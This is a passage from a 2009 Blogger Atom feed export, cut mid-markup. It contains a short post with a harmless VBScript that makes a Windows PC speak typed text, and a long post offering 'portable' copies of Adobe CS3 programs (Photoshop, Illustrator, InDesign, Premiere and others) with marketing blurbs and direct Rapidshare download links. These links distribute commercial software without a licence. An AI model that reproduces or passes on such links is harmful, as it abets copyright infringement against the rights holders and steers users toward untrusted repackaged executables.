href='http://myhistoryweb.blogspot.com/2009/03/10-virus-notepad-script.html' title='10 virus notepad script'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-3157097152259531044</id><published>2009-03-25T23:41:00.000-07:00</published><updated>2009-03-28T00:45:38.535-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tricks'/><title type='text'>Make your pc talk!!!</title><content type='html'>make your pc talk&lt;br /&gt;hellooo!&lt;br /&gt;&lt;br /&gt;Open a text file in notepad and write:&lt;br /&gt;&lt;br /&gt;Dim msg, sapi&lt;br /&gt;msg=InputBox("Enter your text","Talk it")&lt;br /&gt;Set sapi=CreateObject("sapi.spvoice")&lt;br /&gt;sapi.Speak msg&lt;br /&gt;&lt;br /&gt;Save the file with a (*.vbs) extension, it will create a VBScript File.&lt;br /&gt;It will prompt you for a text when u open the file, input the text and press ok."&lt;br /&gt;&lt;br /&gt;u will hear what u typed&lt;br /&gt;&lt;br /&gt;this works in xp,may be in vista also.&lt;br /&gt;&lt;br /&gt;enjoy!!!^^&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-3157097152259531044?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/3157097152259531044/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=3157097152259531044' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/3157097152259531044'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/3157097152259531044'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/make-your-pc-talk.html' title='Make your pc talk!!!'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-6221975143721290302</id><published>2009-03-19T05:33:00.000-07:00</published><updated>2009-04-13T06:58:49.573-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software'/><title type='text'>14 Adobe Portable Applications!!</title><content type='html'>&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Applications:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;&lt;b&gt;Adobe.Photoshop.CS3.v10.0.Extended (58,10 MB)&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;Adobe.Illustrator.CS3 (81,70 MB)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;Adobe.Audition (42,78 MB)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;ADOBE.INDESIGN.CS3 (95MB y 24,67 MB)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;ADOBE.CONTRIBUTE.CS3 (24,72 MB)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;Adobe Pagemaker (30,62 MB)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;Adobe Photoshop Lightroom (20,73 MB)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;Adobe Encore CS3 (48,16 MB)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;Adobe Fireworks (48,30 MB)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;Adobe After Effects (95MB y 9MB)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;Adobe LiveCycle Designer 8.0 (61,03 MB)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;Adobe Premiere Pro CS3 (63,70 MB)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;Adobe Soundbooth CS3 (53,91 MB)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;Adobe Flash CS3(99 MB)&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:blue;"&gt;Adobe.Photoshop.CS3.v10.0.Extended&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Applications:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Adobe Photoshop CS3&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;- Adobe ExtendScript Toolkit CS3&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;- Adobe Bridge CS3&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;- Adobe Device Central CS3&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;- Adobe Stock Photos CS3&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/129599612/Adobe_Photoshop_PS3_Portable_mNy90.rar"&gt;http://rapidshare.com/files/129599612/Adobe_Photoshop_PS3_Portable_mNy90.rar&lt;/a&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:blue;"&gt;Adobe.Illustrator.CS3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Efficiently create sophisticated vector artwork for virtually any medium&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Explore and apply color variations using dynamic new color controls&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Be more productive with new and enhanced features to get your artwork going&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Streamline your design workflows by moving easily between Illustrator CS3 and other Adobe applications&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Enhance your artwork with professional typography and transparent effects&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/129732782/Portable_Adobe_Illustrator_CS3_mNy90.rar"&gt;http://rapidshare.com/files/129732782/Portable_Adobe_Illustrator_CS3_mNy90.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:blue;"&gt;ADOBE.INDESIGN.CS3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;* Design professional page layouts using rich creative options&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Boost efficiency through productivity enhancements and tight integration&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Automate workflows and processes, including long-document publishing&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Flexible XML import and export controls and robust scripting support&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Design compelling page layouts that include transparency, creative effects, and gradient feathers.&lt;br /&gt;&lt;a href="http://rapidshare.com/files/129720950/Portable_Adobe_InDesign_CS3_mNy90.part1.rar"&gt;&lt;br /&gt;http://rapidshare.com/files/129720950/Portable_Adobe_InDesign_CS3_mNy90.part1.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/129532938/Portable_Adobe_InDesign_CS3_mNy90.part2.rar"&gt;http://rapidshare.com/files/129532938/Portable_Adobe_InDesign_CS3_mNy90.part2.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:blue;"&gt;Adobe Audition (with MANUAL)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;* All-in-one solution for audio recording, mixing, editing, and mastering&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Powerful, flexible, low-latency mixing engine with VSTi support for real-time recording and editing&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Complete audio mastering and restoration toolset for unprecedented flexibility and control&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Edit audio more effectively with enhanced editing tools, and work faster with improved multicore support and enhanced efficiency in the mixing engine&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Work with more than 50 digital signal processing (DSP) tools and effects, mastering and analysis tools, and audio restoration features.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/129738442/Portable_Adobe_Audition_2.0_mNy90.rar"&gt;http://rapidshare.com/files/129738442/Portable_Adobe_Audition_2.0_mNy90.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Maual:&lt;a href="http://rapidshare.com/files/129592824/Adobe.Audition.v3.0.Manual.Addon.Multilingual_mNy90.rar"&gt;http://rapidshare.com/files/129592824/Adobe.Audition.v3.0.Manual.Addon.Multilingual_mNy90.rar&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:blue;"&gt;ADOBE.CONTRIBUTE.CS3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;* Update multiple websites and blogs from a single application&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Maintain website integrity and look and feel through integration with Dreamweaver templates&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Control website authoring permissions with site administration and connection management consoles&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Post and publish content from within !! MS Software is not allowed !! Office applications&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Now compatible with Windows Vista and Intel based Macs.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/129635089/Portable_Adobe_Contribute_CS3_mNy90.rar"&gt;http://rapidshare.com/files/129635089/Portable_Adobe_Contribute_CS3_mNy90.rar&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;a href="http://rapidshare.com/files/129668954/Portable_Adobe_GoLive_CS3_mNy90.rar"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:blue;"&gt;Adobe Pagemaker&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;* Adobe PageMaker 7.0 helps users create an impressive variety of printed publications. Professional-quality tools and multiple options ensure that your business or personal printing looks sharp, reads well and gets attention!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Familiar Adobe menus, palettes, and keyboard shortcuts to cut down your design time and help you work more efficiently&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Lay out complete publications in just a few clicks -- design frame to hold text &amp;amp; graphics, apply master pages and work with layers to set up multiple versions of publications&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Edit your work easily with the built-in story editor&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;* Thousands of great templates for newsletters, brochures, reports, business stationery, and other publications.&lt;br /&gt;&lt;a href="http://rapidshare.com/files/129514497/Portable_Adobe_PageMaker_7.01_mNy90.rar"&gt;&lt;br /&gt;http://rapidshare.com/files/129514497/Portable_Adobe_PageMaker_7.01_mNy90.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:blue;"&gt;Adobe Encore CS3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/129561421/Adobe_Encore_CS3_mNy90.rar"&gt;http://rapidshare.com/files/129561421/Adobe_Encore_CS3_mNy90.rar&lt;/a&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:blue;"&gt;&lt;br /&gt;Adobe Fireworks&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Top features&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Vector and bitmap editing&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Create and edit vector and bitmap images, and import and edit native Adobe® Photoshop® and Adobe Illustrator® files.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Image optimization&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Optimize graphics for virtually any delivery scenario with preview, cross-platform gamma preview, selective JPEG compression, and a wide range of export controls. &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Photoshop and Illustrator integration&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Efficient Photoshop and Illustrator integration&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Import Photoshop (PSD) files while retaining hierarchical layers, layer effects, and blend modes. Save Adobe Fireworks® (PNG) files back into Photoshop (PSD) format. Import Illustrator (AI) files while retaining graphic integrity, including layer, group, and color information.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/129566073/Adobe_Fireworks_CS3_mNy90.rar"&gt;http://rapidshare.com/files/129566073/Adobe_Fireworks_CS3_mNy90.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:blue;"&gt;Adobe LiveCycle Designer 8.0&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Adobe LiveCycle Designer is a forms authoring tool published by Adobe Systems. The purpose of Designer is to be a one-stop design tool for XML forms to be rendered as PDF or HTML files.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Features&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Designer forms are structured documents with a hierarchical structure that can be converted into XML. This structure can include structure from XML Schema and example XML files. &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/129572316/Adobe_LiveCycle_Designer_8.0_mNy90.rar"&gt;&lt;span style="font-family:monospace;"&gt;http://rapidshare.com/files/129572316/Adobe_LiveCycle_Designer_8.0_mNy90.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:blue;"&gt;Adobe Premiere Pro CS3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Capture, edit, and deliver video to disc, the web, and mobile devices&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Make every phase of video production more efficient with Adobe® Premiere® Pro CS3 software, which includes Adobe OnLocation™ CS3* (Windows® only) and Adobe Encore® CS3.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Learn about Adobe's plans for Creative Suite 3 on Mac OS X Leopard. (PDF, 105k)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Native support for Sony XDCAM and Panasonic P2 formats &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Output to DVD and Blu-ray Disc &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;High-quality slow motion with time remapping &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Direct-to-disk recording and professional on-set monitoring &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Publish Adobe Encore projects to the web &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Multiple project panels with smart file search &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Improved editing efficiency &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Output for mobile devices &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/129581891/Adobe_Premiere_Pro_CS3_mNy90.rar"&gt;http://rapidshare.com/files/129581891/Adobe_Premiere_Pro_CS3_mNy90.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:blue;"&gt;Adobe Soundbooth CS3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Description:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Adobe Soundbooth CS3 software lets you take command of your audio in film, video, and Adobe Flash software projects. Use on-clip controls to make fast edits and intuitive, task-based tools to clean up recordings, polish voice-overs, customize music, modify sound effects, apply high-quality filters, and much more. Tight integration with Flash CS3 Professional and Adobe Premiere Pro CS3 software and an intuitive, visual interface mean you can get the job done quickly without sacrificing creative control.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/129588081/Adobe_Soundbooth_CS3_mNy90.rar"&gt;http://rapidshare.com/files/129588081/Adobe_Soundbooth_CS3_mNy90.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:blue;"&gt;Adobe Photoshop Lightroom&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Perform nondestructive editing&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Enjoy robust support for more than 150 camera raw formats, and experiment with confidence. Adjustments you make to images in Lightroom won't alter the original data, whether you're working on a JPEG, TIFF, DNG, or camera raw file.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Enjoy an elegant, uncluttered interface&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Ease the learning curve and be productive quickly. Task-oriented modules whisk you through typical workflow tasks by putting just the tools you need at your fingertips. &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Professional editing tools&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Fine-tune your photographs with precise, easy-to-use tools for globally correcting white balance, exposure, tone curves, lens distortion, and color casts.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/129574579/Adobe_Photoshop_Lightroom_mNy90.rar"&gt;http://rapidshare.com/files/129574579/Adobe_Photoshop_Lightroom_mNy90.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:blue;"&gt;Adobe After Effects CS3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Create motion graphics and visual effects with the industry standard&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Adobe® After Effects® CS3 Professional software is an essential upgrade. Design vector graphics, create more organic movements, and expedite delivery with new integration and collaboration features.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Learn about Adobe's plans for Creative Suite 3 on Mac OS X Leopard. (PDF, 105k)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Reasons to upgrade&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Shape Layers &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Puppet tool &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Adobe Photoshop® CS3 Extended integration &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Adobe Flash® CS3 Professional integration &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Per-character 3D text animation &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Brainstorm &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Complete color management workflow &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Adobe Clip Notes &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Enhanced performance &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-family:Verdana;"&gt;Video for mobile&lt;br /&gt;&lt;br /&gt;&lt;a 